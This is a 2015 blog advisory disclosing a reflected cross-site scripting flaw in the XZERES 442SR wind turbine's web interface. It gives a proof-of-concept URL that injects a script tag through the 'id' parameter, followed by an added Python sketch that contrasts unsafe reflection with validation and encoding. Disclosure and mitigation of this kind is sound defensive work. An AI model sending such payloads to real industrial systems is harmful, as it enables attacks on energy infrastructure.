Thursday, December 24, 2015

[ICS] XZERES 442SR Wind Turbine XSS Vulnerability

[ICS] XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability


AFFECTED PRODUCTS
XZERES is a US-based energy company that maintains offices in several countries around the world, including the UK, Italy, Japan, Vietnam, Philippines, and Myanmar.

The affected product, 442SR Wind Turbine, has a web-based interface system. According to XZERES, the 442SR is deployed across the Energy sector. XZERES estimates that this product is used worldwide.

Reference

Vulnerable parameter
id

PoC
http://<IP>/details?object=Inverter&id=2<script>alert("xss-id-parameter")</script>
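
Mitigation sketch, added here as an example (it is not XZERES code and not part of the original post): a handler that reflects `id` verbatim next to one that validates and HTML-encodes it. The function names, the numeric-id rule, the single-entry object allowlist and the 192.0.2.10 test address are assumptions; the page shows only the `object` and `id` parameters.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: "Inverter" is the only object name shown on the page, so the
# allowlist holds just that; a real device would list all of its objects.
ALLOWED_OBJECTS = {"Inverter"}
# Assumption: ids are short decimal numbers, as in the PoC's "id=2".
ID_PATTERN = re.compile(r"[0-9]{1,6}")

# Constructed sample requests (192.0.2.10 is a documentation-only address).
POC_URL = ('http://192.0.2.10/details?object=Inverter'
           '&id=2<script>alert("xss-id-parameter")</script>')
BENIGN_URL = "http://192.0.2.10/details?object=Inverter&id=2"


def _params(url):
    """Extract the first value of 'object' and 'id' from the query string."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("object", [""])[0], query.get("id", [""])[0]


def render_details_unsafe(url):
    """Reflects id verbatim into HTML: the behaviour the PoC depends on."""
    obj, obj_id = _params(url)
    return f"<h1>{obj} #{obj_id}</h1>"


def render_details_safe(url):
    """Return (HTTP status, body): validate input, then encode on output."""
    obj, obj_id = _params(url)
    if obj not in ALLOWED_OBJECTS or not ID_PATTERN.fullmatch(obj_id):
        # The rejected value is never echoed back in the error page.
        return 400, "<h1>Bad request</h1>"
    # Encoding stays in place after validation as defence in depth.
    return 200, f"<h1>{html.escape(obj)} #{html.escape(obj_id)}</h1>"


if __name__ == "__main__":
    print(render_details_unsafe(POC_URL))   # markup reaches the page intact
    print(render_details_safe(POC_URL))     # rejected with 400
    print(render_details_safe(BENIGN_URL))  # rendered normally
```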



Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.